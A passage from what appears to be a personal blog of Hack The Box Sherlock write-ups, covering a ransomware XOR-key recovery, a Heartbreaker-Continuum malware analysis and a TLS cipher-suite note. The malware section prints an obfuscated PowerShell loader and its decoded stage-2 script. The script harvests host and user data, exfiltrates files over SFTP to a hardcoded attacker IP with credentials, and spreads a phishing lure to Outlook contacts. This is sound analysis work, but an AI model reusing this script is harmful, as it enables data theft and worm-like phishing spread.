                   (pcVar2 = strstr(local_18->d_name,".xlsx"), pcVar2 != (char *)0x0)))) ||
                 ((pcVar2 = strstr(local_18->d_name,".csv"), pcVar2 != (char *)0x0 ||
                  ((pcVar2 = strstr(local_18->d_name,".json"), pcVar2 != (char *)0x0 ||
                   (pcVar2 = strstr(local_18->d_name,".xml"), pcVar2 != (char *)0x0)))))))) {
          printf("Encrypting: %s\n",local_418);
          encrypt_file(local_418,param_2);
        }
      }
    }
    closedir(local_10);
  }
  return;
}

param_2 is passed in encrypt_file function and param_2 is bhUlIshutrea98liOp which means this is the key for encryption of file,

encrypt_file(local_418,param_2);

bhUlIshutrea98liOp

Task 2

We have recently received an email from wbevansn1@cocolog-nifty.com demanding to know the first and last name we have him registered as. They believe they made a mistake in the application process. Please confirm the first and last name of this applicant.

encrypt_file function is doing simple XOR operation to encrypt a file using given key,

    for (local_20 = 0; uVar2 = local_20, (long)local_20 < (long)local_30; local_20 = local_20 + 1) {
      bVar1 = *(byte *)((long)local_38 + local_20);
      sVar4 = strlen(param_2);
      *(byte *)((long)local_38 + local_20) = bVar1 ^ param_2[uVar2 % sVar4];
    }

So simple take the key bhUlIshutrea98liOp and try to decrypt any file, let's say complaints.csv.24bes and it works so i made simple decryptor.py to decrypt all the file,

Here is decryptor.py code,

import os

def decrypt_file(filename, key):
    try:
        with open(filename, "rb") as file:
            encrypted_data = file.read()
        
        print(f"Encrypted file size: {len(encrypted_data)}")
        
        # Decrypt using XOR with the key
        key_length = len(key)
        decrypted_data = bytearray(
            encrypted_data[i] ^ ord(key[i % key_length]) for i in range(len(encrypted_data))
        )
        
        # Generate original filename
        if filename.endswith(".24bes"):
            original_filename = filename[:-6]
        else:
            original_filename = filename + ".decrypted"
        
        print(f"Original filename generated: {original_filename}")
        
        try:
            with open(original_filename, "wb") as file:
                file.write(decrypted_data)
            print(f"Successfully wrote decrypted file: {original_filename}")
        except Exception as e:
            print(f"Error writing file {original_filename}: {e}")
    except Exception as e:
        print(f"Error decrypting file {filename}: {e}")

def decrypt_all_files(directory, key):
    for root, _, files in os.walk(directory):
        print(f"Checking directory: {root}")
        for file in files:
            print(f"Found file: {file}")
            if file.endswith(".24bes"):
                print(f"Decrypting: {file}")
                decrypt_file(os.path.join(root, file), key)

def main():
    directory = "."
    key = "bhUlIshutrea98liOp"
    print(f"Starting decryption in {directory} with key: {key}")
    decrypt_all_files(directory, key)
    print("Decryption process completed.")

if __name__ == "__main__":
    main()

So just simple apply this command so see is whether is there any related strings present,
- And i found the name related to this email,

cat * | grep -Rin 'wbevansn1@cocolog-nifty.com'

This string is present in forela_uk_applicants.sql file and in 872 line no,

(830,'Walden','Bevans','wbevansn1@cocolog-nifty.com','Male','Aerospace Manufacturing','2023-02-16'),

Walden Bevans

Task 3

What is the MAC address and serial number of the laptop assigned to Hart Manifould?

This info must be available in it_assets.xml file because it is asking about laptop,
So i tried to open that file but it seems very unappropriated so i used this tool to format it and i got this file,

xmllint --format it_assets.xml > formated_it_assets.xml

So i tried to find this name Hart Manifould and i got associated MAC Address and Serial Number,

E8-16-DF-E7-52-48, 1316262

Task 4

What is the email address of the attacker?

This is asking about attackers email which is written in ransom note of any file like this, complaints.csv.24bes_note.txt.

bes24@protonmail.com

Task 5

City of London Police have suspicions of some insider trading taking part within our trading organization. Please confirm the email address of the person with the highest profit percentage in a single trade alongside the profit percentage.

File will be most probably trading-firebase_bkup.json
For this task i used jq tool which is best for json filtration,
Here is command i used,

to_entries converts the object into an array of {key, value} objects
max_by(.value.profit_percentage) finds the entry with the highest profit percentage
.value.email prints email
.value.profit_percentage prints profit %

jq -r 'to_entries | max_by(.value.profit_percentage) | .value.email, .value.profit_percentage' trading-firebase_bkup.json

fmosedale17a@bizjournals.com, 142303.1996053929628411706675436

Task 6

Our E-Discovery team would like to confirm the IP address detailed in the Sales Forecast log for a user who is suspected of sharing their account with a colleague. Please confirm the IP address for Karylin O'Hederscoll.

This data will be present on sales_forecast.xlsx file,

87,"Karylin","O'Hederscoll","kohederscoll2e@dagondesign.com","Female","8.254.104.208","Pakistan","Consulting Hours","8/7/2022",983,1957.61,503.49,494930.67,1924330.63,1429399.96,415

8.254.104.208

Task 7

Which of the following file extensions is not targeted by the malware? `.txt, .sql, .ppt, .pdf, .docx, .xlsx, .csv, .json, .xml`

else if ((local_18->d_type == '\b') &&
(((((pcVar2 = strstr(local_18->d_name,".txt"), pcVar2 != (char *)0x0 ||
(pcVar2 = strstr(local_18->d_name,".sql"), pcVar2 != (char *)0x0)) ||
 (pcVar2 = strstr(local_18->d_name,".pdf"), pcVar2 != (char *)0x0)) ||
((pcVar2 = strstr(local_18->d_name,".docx"), pcVar2 != (char *)0x0 ||
 (pcVar2 = strstr(local_18->d_name,".xlsx"), pcVar2 != (char *)0x0)))) ||
 ((pcVar2 = strstr(local_18->d_name,".csv"), pcVar2 != (char *)0x0 ||
((pcVar2 = strstr(local_18->d_name,".json"), pcVar2 != (char *)0x0 ||
 (pcVar2 = strstr(local_18->d_name,".xml"), pcVar2 != (char *)0x0)))))))) {
printf("Encrypting: %s\n",local_418);

.ppt

Task 8

We need to confirm the integrity of the files once decrypted. Please confirm the MD5 hash of the applicants DB.

f3894af4f1ffa42b3a379dddba384405

Task 9

We need to confirm the integrity of the files once decrypted. Please confirm the MD5 hash of the trading backup.

87baa3a12068c471c3320b7f41235669

Task 10

We need to confirm the integrity of the files once decrypted. Please confirm the MD5 hash of the complaints file.

c3f05980d9bd945446f8a21bafdbf4e7

HTB Sherlocks Heartbreaker-Continuum March 2025

Sun, 30 Mar 2025 00:00:00 GMT

Sherlock Scenario
- Following a recent report of a data breach at their company, the client submitted a potentially malicious executable file. The file originated from a link within a phishing email received by a victim user. Your objective is to analyze the binary to determine its functionality and possible consequences it may have on their network. By analyzing the functionality and potential consequences of this binary, you can gain valuable insights into the scope of the data breach and identify if it facilitated data exfiltration. Understanding the binary's capabilities will enable you to provide the client with a comprehensive report detailing the attack methodology, potential data at risk, and recommended mitigation steps.
Category: Malware Analysis
Difficulty: Easy
File: HeartBreakerContinuum.zip

Task 1

To accurately reference and identify the suspicious binary, please provide its SHA256 hash.

I used sha256sum tool in wsl kali (Windows Subsystem Linux).

12DAA34111BB54B3DCBAD42305663E44E7E6C3842F015CCCBBE6564D9DFD3EA3

Task 2

When was the binary file originally created, according to its metadata (UTC)?

I can use a tool such as PEStudio, which is used for spotting suspicious artifacts in executable files, to find the correct creation date of the executable file.
After loading the file, we notice the creation date under the "stamps" section as March 13, 2024, 10:38:06 UTC.

2024-03-13 10:38:06

Task 3

Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?

We can use pestudio again and under the optional-header (subsystem > GUI) we can see size-of-code field and value is 38400 bytes
It is the total size (in bytes) of the executable code in the PE file (usually the .text section).

Task 4

It appears that the binary may have undergone a file conversion process. Could you determine its original filename?

There is one PowerShell file inside resources section of PE which is newILY.ps1 and instance say that it is .NET Assembly.
This means the executable likely started as a PowerShell script, and then threat actor converted or wrapped it into an EXE - usually using a tool like:
- PS2EXE
- PowerShell packer/converter
- Custom .NET wrapper
- Malware stager that embeds .ps1 inside resources
PE files don’t normally contain a PowerShell script inside their resources unless: the EXE was created from that PS1 script.
So we simply dump it and save it for later analysis.

newILY.ps1

Task 5

Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.

To solve this, I used the tool HxD.
After opening the file and scrolling until we come across the obfuscated code segment, we find the hexadecimal offset to start at 2C74.

2C74

Task 6

The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?

Right away, we can tell this is Base64 encoded, hinted at by the equal signs (==). Additionally, we can also tell that we need to reverse the obfuscated script, as these equal signs usually appear at the end.
We can use a tool like CyberChef to reverse the script and decode the Base64 algorithm to obtain the human-readable script utilized by the executable:
Here is the whole PowerShell script newILY.ps1

$sCrt = "==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" ;
$enC = $sCrt.ToCharArray() ; [array]::Reverse($enC) ; -join $enC 2>&1> $null ;
$bOom = [sYsTeM.tExT.eNcOdInG]::uTf8.GeTsTrInG([sYsTeM.cOnVeRt]::fRoMbASe64sTrInG("$enC")) ;
$iLy = "iNv"+"OKe"+"-Ex"+"PrE"+"SsI"+"On" ; NeW-AliAs -NaMe ilY -VaLuE $iLy -FoRcE ; ilY $bOom ;

And it is indeed execute this base64 encoded text as we can see it is building iNv"+"OKe"+"-Ex"+"PrE"+"SsI"+"On as iNvOKe-ExPrESsIOn.
Step 1: Reverse Base64 code

Here is the decode text so i saved this as stage2.ps1,

$hostname = $env:COMPUTERNAME
$currentUser = $env:USERNAME
$url = "http://44.206.187.144:9000/Superstar_MemberCard.tiff"
$img = "C:\users\$currentUser\Downloads\Superstar_MemberCard.tiff"

Invoke-WebRequest -Uri $url -OutFile $img
Start-Process $img

$searchDir = "C:\Users"
$targetDir = "C:\Users\Public\Public Files"

if (-not (Test-Path -Path $targetDir -PathType Container)) {
    New-Item -ItemType Directory -Path $targetDir -Force | Out-Null
}

$currentUser | Out-File -FilePath (Join-Path $targetDir 'username.txt') -Force

nltest /dsgetdc:$env:USERDOMAIN 2>$null | Out-File -FilePath (Join-Path $targetDir 'DCinfo.txt') -Force
Get-WmiObject -Class Win32_UserAccount | Out-File -FilePath (Join-Path $targetDir 'localusers.txt') -Force
wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value 2>$null | Out-File -FilePath (Join-Path $targetDir 'AVinfo.txt') -Force

$currentUserProcesses = Get-WmiObject Win32_Process | Where-Object {
    try {
        $_.GetOwner().User -eq $currentUser
    } catch {
        $false  
    }
}

$currentUserProcesses | Select-Object ProcessName, ProcessId | Out-File -FilePath (Join-Path $targetDir 'UserProcesses.txt') -Force

if (Get-Process -Name Outlook -ErrorAction SilentlyContinue) {
    Stop-Process -Name Outlook -Force -ErrorAction SilentlyContinue
}

$extList =  "*.doc", "*.docx", "*.xls", "*.xlsx", "*.ppt", "*.pptx", "*.pdf", "*.csv", ".*oft", "*.potx", 
            "*.xltx", "*.dotx", "*.msg", "*.eml", "*.pst",  "*.odt", "*.ods", "*.odp", "*.odg", "*.ost"
             
$null = Get-ChildItem $searchDir -Recurse -Include $extList -Force -ErrorAction 'SilentlyContinue' |
    ForEach-Object {
        $destinationPath = Join-Path $targetDir $_.Name
        
        if ($_.FullName -ne $destinationPath) {
            Copy-Item -Path $_.FullName -Destination $destinationPath -Force
        }
    }

Get-SmbShare | Out-File -FilePath (Join-Path $targetDir 'Shareinfo.txt') -Force
gpresult /r | Out-File -FilePath (Join-Path $targetDir 'GPinfo.txt') -Force
$ProgressPreference = 'SilentlyContinue'
$archivePath = "$targetDir\$hostname.zip"
Compress-Archive -Path $targetDir -DestinationPath $archivePath -Force 

$wZipUrl = "https://us.softradar.com/static/products/winscp-portable/distr/0/winscp-portable_softradar-com.zip"
$wZipFile = "$targetDir\WinSCP.zip"
$wExtractPath = "C:\Users\Public\HelpDesk-Tools"

Invoke-WebRequest -UserAgent "Wget" -Uri $wZipUrl -OutFile $wZipFile -UseBasicParsing
Expand-Archive -Path $wZipFile -DestinationPath $wExtractPath -Force

$wExePath = "$wExtractPath\WinSCP.com"
$sPath = "$wExtractPath\maintenanceScript.txt"
@"
open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*
put `"$archivePath`"
close
exit
"@ | Out-File -FilePath $sPath -Force
Start-Process -FilePath $wExePath -ArgumentList "/script=`"$sPath`"" -Wait -NoNewWindow


$outlookPath  = Get-ChildItem -Path "C:\Program Files\Microsoft Office" -Filter "OUTLOOK.EXE" -Recurse | Select-Object -First 1 -ExpandProperty FullName

$htmlBody = @"
<!DOCTYPE html>
<html>
<head>
<style>
    body {
    font-family: Calibri, sans-serif;
    }
</style>
</head>
<body>
<p>Hey, </p> <p> Hope you're doing great when you see this. I'm reaching out because there's something I've been wanting to share with you. You know that feeling when you've been admiring someone from afar, but hesitated to take the next step? That's been me lately, but I've decided it's time to change that.</p>
<p>In a world where we often rush through everything, I believe in the beauty of taking things slow, cherishing each moment like a scene from a timeless tale. So, if you're open to it, I'd love for us to meet up after hours.</p>
<p>I've arranged for a rendezvous at a private membership club, where we can enjoy a bit of privacy and exclusivity. I've attached the map for your convenience. </p>
<p>To gain entry, you'll need a digital membership card for entry, accessible <a href='http://44.206.187.144:9000/Superstar_MemberCard.tiff.exe'>here</a>. Just a friendly heads up, there's a time limit before you can download it, so it's best to grab it sooner rather than waiting too long.</p>
<p>Counting on seeing you there later.</p>
</body>
</html>
"@

if ($outlookPath) {
    Start-Process -FilePath $outlookPath
    $outlook = New-Object -ComObject Outlook.Application
    $namespace = $outlook.GetNamespace("MAPI")
    $contactsFolder = $namespace.GetDefaultFolder(10) 
    $csvFilePath = "$targetDir\Contacts.csv"
    $contactsFolder.Items | ForEach-Object {
        $_.GetInspector | ForEach-Object {
            $_.Close(0)  
        }
        $props = @{
            'Full Name'      = $_.FullName
            'Email Address'  = $_.Email1Address
            
        }
        New-Object PSObject -Property $props
    } | Export-Csv -Path $csvFilePath -NoTypeInformation

    $contacts = Import-Csv -Path $csvFilePath
    $mailItem = $outlook.CreateItem(0)
    $mailItem.Subject = "Fingers crossed you'll notice.."
    $mailItem.HtmlBody = $htmlBody
    $mailItem.Attachments.Add($img) > $null
    $mailItem.BodyFormat = 2 

    foreach ($contact in $contacts) {
        $bccRecipient = $mailItem.Recipients.Add($contact."Email Address")
        $bccRecipient.Type = [Microsoft.Office.Interop.Outlook.OlMailRecipientType]::olBCC
    }

    $mailItem.Recipients.ResolveAll() > $null
    $mailItem.Send()
}

Remove-Item -Path $wExtractPath -Recurse -Force
Remove-Item -Path $targetDir -Recurse -Force

Base64

Task 7

What is the specific cmdlet utilized that was used to initiate file downloads?

In that stage2.ps1 there is one cmdlet used which is Invoke-WebRequest, It is used for download files from web,

Invoke-WebRequest

Task 8

Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.

Here are the 2 IP Addresses found in that same stage2.ps1 file,

35.169.66.138,44.206.187.144

Task 9

The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?

In the same file there is one path stored as string inside $targetDir which is storing all files to that C:\Users\Public\Public Files directory,

C:\Users\Public\Public Files

Task 10

What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data?

T1119 : Automated Collection
- Once established within a system or network, an adversary may use automated techniques for collecting internal data.
- Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals.|

T1119

Task 11

What is the password utilized to exfiltrate the collected files through the file transfer program within the binary?

Creates an SFTP script (WinSCP script)
Uses hardcoded credentials
Connects to attacker-controlled SFTP server
Uploads stolen files (archivePath)
Runs silently using WinSCP
- Its purpose: covert data exfiltration to a remote server.

M8&C!i6KkmGL1-#

TLS Handshake

Fri, 28 Feb 2025 00:00:00 GMT

TLS Structure and Working

Note > For better appearance, download the image.

Cipher Suites in Handshake

This Field is present to the TLS Client Hello Packet in Application Layer

From Most Secure to Least Secure
There can be different suites for different version of TLS

Cipher Suites (21 suites) 
    Cipher Suite: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02f)
    Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 (0xc02b)
    Cipher Suite: TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (0x009e)
    Cipher Suite: TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 (0xcc14)
    Cipher Suite: TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (0xcc13)
    Cipher Suite: TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (0xcc15)
    Cipher Suite: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014)
    Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a)
